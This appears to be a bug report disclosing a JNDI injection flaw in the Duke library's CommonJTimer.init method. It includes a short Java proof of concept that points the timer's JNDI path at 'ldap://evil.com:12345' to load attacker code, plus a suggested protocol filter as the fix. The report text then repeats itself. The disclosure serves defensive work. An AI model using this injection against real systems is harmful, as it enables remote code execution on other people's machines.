Affected Version
The latest version 1.2 and below.
Describe the vulnerabilityno.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);
To Reproduce
Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
Affected Version The latest version 1.2 and below.
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties)is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary codes. For instance, following codes will lead to the execution of arbitrary codes from attackers:To Reproduce Build an LDAP server and provide malicious codes. Then just execute above codes would reproduce it.
Fix Suggestion Filter LDAP, RMI and related protocols when using
lookup.